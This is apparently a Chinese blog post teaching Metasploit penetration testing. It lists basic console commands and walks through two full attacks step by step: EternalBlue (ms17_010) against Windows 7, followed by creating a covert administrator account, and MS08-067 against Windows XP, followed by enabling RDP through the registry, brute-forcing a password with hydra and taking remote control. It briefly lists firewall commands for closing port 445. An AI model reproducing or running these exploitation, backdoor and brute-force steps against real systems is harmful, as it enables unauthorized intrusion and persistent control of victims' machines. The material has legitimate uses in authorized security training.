metasploit渗透测试

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/BigYellowHsw/article/details/78482027

一些常用指令

msfconsole 打开控制台终端
msfupdate 更新
help [command] e.g. help search 命令使用帮助信息
search […] e.g. search portscan

use … 选择渗透攻击模块
show payloads 查看与该攻击模块相兼容的攻击载荷
set payload … 设置攻击载荷
set target 设置目标
show options 查看需要设置的配置参数
exploit 实施渗透攻击

metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits

nmap <扫描选项><扫描目标>

攻击实例

1、利用永恒之蓝(ms17_010)漏洞攻击win7

  1. 打开metasploit
    msfconsole
  2. 使用永恒之蓝模块
    search ms17-01
    use exploit/windows/smb/ms17_010_eternalblue
  3. 填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改
    show options
    set RHOST 192.168.12.1
  4. 攻击
    exploit或者run
  5. 创建新用户,偷偷的控制使用
    net user admin 123456 /add
  6. 提权,将新创建的用户admin提到管理员权限
    net localgroup administrators admin /add
    查看权限:
    net user admin

防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”

2、利用Windows Server服务RPC请求缓冲区溢出漏洞(ms_08067)入侵WinXP

  1. 在msfconsole使用search命令搜索MS08067漏洞攻击程序
  2. 使用use命令调用MS08067漏洞攻击程序
    use exploit/windows/smb/ms08_067_netapi
  3. 使用show options 命令查看需要设置的选项
    可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)
    使用 set 命令设置 Module Options,此处需要设置目标IP
  4. 接着设置Exploit target,使用show targets 查看可选项
    可以看出哪些版本的系统存在此漏洞,攻击的XP系统为WinXP SP3 简体中文版,即使用set target 命令设置目标,此处即为set target 34
  5. 此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击,执行exploit命令后得到一个meterpreter
  6. 在meterpreter中输入shell即可进入CMD窗口
  7. 可以进行一些攻击,如远程桌面控制:
    —-打开RDP服务
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    —-使用netstat -an命令查看端口是否开放
    —-接着使用net user命令查看XP系统中的用户
    net user
    —-然后针对指定用户比如sysorem用户进行登录密码爆破
    hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
    —-使用hydra爆破密码得:12345接着就能直接登录XP进行远程控制
    rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
    —-完成远程控制

没有更多推荐了,返回首页